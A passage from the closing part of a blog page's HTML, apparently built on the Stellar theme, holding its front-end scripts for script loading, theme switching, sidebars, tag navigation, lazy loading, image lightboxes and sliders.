      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    }),

    jq: (fn) => {
      if (typeof jQuery === 'undefined') {
        utils.js(deps.jquery).then(fn)
      } else {
        fn()
      }
    },
    
    onLoading: (el) => {
      if (el) {
        $(el).append('<div class="loading-wrap"><svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" stroke-opacity=".3" d="M12 3C16.9706 3 21 7.02944 21 12C21 16.9706 16.9706 21 12 21C7.02944 21 3 16.9706 3 12C3 7.02944 7.02944 3 12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="1.3s" values="60;0"/></path><path stroke-dasharray="15" stroke-dashoffset="15" d="M12 3C16.9706 3 21 7.02944 21 12"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.3s" values="15;0"/><animateTransform attributeName="transform" dur="1.5s" repeatCount="indefinite" type="rotate" values="0 12 12;360 12 12"/></path></g></svg></div>');
      }
    },
    onLoadSuccess: (el) => {
      if (el) {
        $(el).find('.loading-wrap').remove();
      }
    },
    onLoadFailure: (el) => {
      if (el) {
        $(el).find('.loading-wrap svg').remove();
        $(el).find('.loading-wrap').append('<svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" d="M12 3L21 20H3L12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.5s" values="60;0"/></path><path stroke-dasharray="6" stroke-dashoffset="6" d="M12 10V14"><animate fill="freeze" attributeName="stroke-dashoffset" begin="0.6s" dur="0.2s" values="6;0"/></path></g><circle cx="12" cy="17" r="1" fill="currentColor" fill-opacity="0"><animate fill="freeze" attributeName="fill-opacity" begin="0.8s" dur="0.4s" values="0;1"/></circle></svg>');
        $(el).find('.loading-wrap').addClass('error');
      }
    },
    request: (el, url, callback, onFailure) => {
      let retryTimes = 3;
      utils.onLoading(el);
      function req() {
        return new Promise((resolve, reject) => {
          let status = 0; // 0 等待 1 完成 2 超时
          let timer = setTimeout(() => {
            if (status === 0) {
              status = 2;
              timer = null;
              reject('请求超时');
              if (retryTimes == 0) {
                onFailure();
              }
            }
          }, 5000);
          fetch(url).then(function(response) {
            if (status !== 2) {
              clearTimeout(timer);
              resolve(response);
              timer = null;
              status = 1;
            }
            if (response.ok) {
              return response.json();
            }
            throw new Error('Network response was not ok.');
          }).then(function(data) {
            retryTimes = 0;
            utils.onLoadSuccess(el);
            callback(data);
          }).catch(function(error) {
            if (retryTimes > 0) {
              retryTimes -= 1;
              setTimeout(() => {
                req();
              }, 5000);
            } else {
              utils.onLoadFailure(el);
              onFailure();
            }
          });
        });
      }
      req();
    },
  };
</script>

<script>
  const sidebar = {
    leftbar: () => {
      if (l_body) {
        l_body.toggleAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    rightbar: () => {
      if (l_body) {
        l_body.toggleAttribute('rightbar');
        l_body.removeAttribute('leftbar');
      }
    },
    dismiss: () => {
      if (l_body) {
        l_body.removeAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    toggleTOC: () => {
      document.querySelector('#data-toc').classList.toggle('collapse');
    }
  }
</script>
<script type="text/javascript">
  (() => {
    const tagSwitchers = document.querySelectorAll('.tag-subtree.parent-tag > a > .tag-switcher-wrapper')
    for (const tagSwitcher of tagSwitchers) {
      tagSwitcher.addEventListener('click', (e) => {
        const parent = e.target.closest('.tag-subtree.parent-tag')
        parent.classList.toggle('expanded')
        e.preventDefault()
      })
    }

    // Get active tag from query string, then activate it.
    const urlParams = new URLSearchParams(window.location.search)
    const activeTag = urlParams.get('tag')
    if (activeTag) {
      let tag = document.querySelector(`.tag-subtree[data-tag="${activeTag}"]`)
      if (tag) {
        tag.querySelector('a').classList.add('active')
        
        while (tag) {
          tag.classList.add('expanded')
          tag = tag.parentElement.closest('.tag-subtree.parent-tag')
        }
      }
    }
  })()
</script>


<!-- required -->
<script src="/js/main.js?v=1.29.1" defer></script>

<script type="text/javascript">
  const applyTheme = (theme) => {
    if (theme === 'auto') {
      document.documentElement.removeAttribute('data-theme')
    } else {
      document.documentElement.setAttribute('data-theme', theme)
    }

    applyThemeToGiscus(theme)
  }

  const applyThemeToGiscus = (theme) => {
    theme = theme === 'auto' ? 'preferred_color_scheme' : theme

    const cmt = document.getElementById('giscus')
    if (cmt) {
      // This works before giscus load.
      cmt.setAttribute('data-theme', theme)
    }

    const iframe = document.querySelector('#comments > section.giscus > iframe')
    if (iframe) {
      // This works after giscus loaded.
      const src = iframe.src
      const newSrc = src.replace(/theme=[\w]+/, `theme=${theme}`)
      iframe.src = newSrc
    }
  }

  const switchTheme = () => {
    // light -> dark -> auto -> light -> ...
    const currentTheme = document.documentElement.getAttribute('data-theme')
    let newTheme;
    switch (currentTheme) {
      case 'light':
        newTheme = 'dark'
        break
      case 'dark':
        newTheme = 'auto'
        break
      default:
        newTheme = 'light'
    }
    applyTheme(newTheme)
    window.localStorage.setItem('Stellar.theme', newTheme)

    const messages = {
      light: `Switched to Light Mode`,
      dark: `Switched to Dark Mode`,
      auto: `Switched to Auto Mode`,
    }
    hud?.toast?.(messages[newTheme])
  }

  (() => {
    // Apply user's preferred theme, if any.
    const theme = window.localStorage.getItem('Stellar.theme')
    if (theme !== null) {
      applyTheme(theme)
    }
  })()
</script>


<!-- optional -->



<script defer>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.services = Object.assign({}, JSON.parse(`{"mdrender":{"js":"/js/services/mdrender.js"},"siteinfo":{"js":"/js/services/siteinfo.js","api":null},"ghinfo":{"js":"/js/services/ghinfo.js"},"sites":{"js":"/js/services/sites.js"},"friends":{"js":"/js/services/friends.js"},"timeline":{"js":"/js/services/timeline.js"},"fcircle":{"js":"/js/services/fcircle.js"},"weibo":{"js":"/js/services/weibo.js"},"memos":{"js":"/js/services/memos.js"}}`));
    for (let id of Object.keys(ctx.services)) {
      const js = ctx.services[id].js;
      if (id == 'siteinfo') {
        ctx.cardlinks = document.querySelectorAll('a.link-card[cardlink]');
        if (ctx.cardlinks?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            setCardLink(ctx.cardlinks);
          });
        }
      } else {
        const els = document.getElementsByClassName(`ds-${id}`);
        if (els?.length > 0) {
          utils.jq(() => {
            if (id == 'timeline' || 'memos' || 'marked') {
              utils.js(deps.marked).then(function () {
                utils.js(js, { defer: true });
              });
            } else {
              utils.js(js, { defer: true });
            }
          });
        }
      }
    }
  });
</script>

<script>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.search = {
      path: `/search.json`,
    }
    utils.js('/js/search/local-search.js', { defer: true });
  });
</script><script>
  window.FPConfig = {
    delay: 0,
    ignoreKeywords: [],
    maxRPS: 5,
    hoverDelay: 25
  };
</script>
<script defer src="https://cdn.jsdelivr.net/npm/flying-pages@2/flying-pages.min.js"></script><script defer src="https://cdn.jsdelivr.net/npm/vanilla-lazyload@19.1.3/dist/lazyload.min.js"></script>
<script>
  // https://www.npmjs.com/package/vanilla-lazyload
  // Set the options globally
  // to make LazyLoad self-initialize
  window.lazyLoadOptions = {
    elements_selector: ".lazy",
  };
  // Listen to the initialization event
  // and get the instance of LazyLoad
  window.addEventListener(
    "LazyLoad::Initialized",
    function (event) {
      window.lazyLoadInstance = event.detail.instance;
    },
    false
  );
  document.addEventListener('DOMContentLoaded', function () {
    window.lazyLoadInstance?.update();
  });
</script><script>
  ctx.fancybox = {
    selector: `.timenode p>img`,
    css: `https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/fancybox/fancybox.css`,
    js: `https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/fancybox/fancybox.umd.js`
  };
  var selector = '[data-fancybox]:not(.error)';
  if (ctx.fancybox.selector) {
    selector += `, ${ctx.fancybox.selector}`
  }
  var needFancybox = document.querySelectorAll(selector).length !== 0;
  if (!needFancybox) {
    const els = document.getElementsByClassName('ds-memos');
    if (els != undefined && els.length > 0) {
      needFancybox = true;
    }
  }
  if (needFancybox) {
    utils.css(ctx.fancybox.css);
    utils.js(ctx.fancybox.js, { defer: true }).then(function () {
      Fancybox.bind(selector, {
        hideScrollbar: false,
        Thumbs: {
          autoStart: false,
        },
        caption: (fancybox, slide) => {
          return slide.triggerEl.alt || slide.triggerEl.dataset.caption || null
        }
      });
    })
  }
</script>
<script>
  window.addEventListener('DOMContentLoaded', (event) => {
    const swiper_api = document.getElementById('swiper-api');
    if (swiper_api != undefined) {
      utils.css(`https://unpkg.com/swiper@10.3.1/swiper-bundle.min.css`);
      utils.js(`https://unpkg.com/swiper@10.3.1/swiper-bundle.min.js`, { defer: true }).then(function () {
        const effect = swiper_api.getAttribute('effect') || '';
        var swiper = new Swiper('.swiper#swiper-api', {
          slidesPerView: 'auto',
          spaceBetween: 8,
          centeredSlides: true,
          effect: effect,
          rewind: true,
          pagination: {
            el: '.swiper-pagination',
            clickable: true,
          },
          navigation: {
            nextEl: '.swiper-button-next',
            prevEl: '.swiper-button-prev',
          },
        });
      })
    }
  });
</script>
<script>
  document.addEventListener('DOMContentLoaded', function () {
    window.codeElements = document.querySelectorAll('.code');
    if (window.codeElements.length > 0) {
      ctx.copycode = {
        default_text: `Copy`,
        success_text: `Copied`,
        toast: `复制成功`,
      };
      utils.js('/js/plugins/copycode.js');
    }
  });
</script>


<!-- inject -->

</div></body></html>
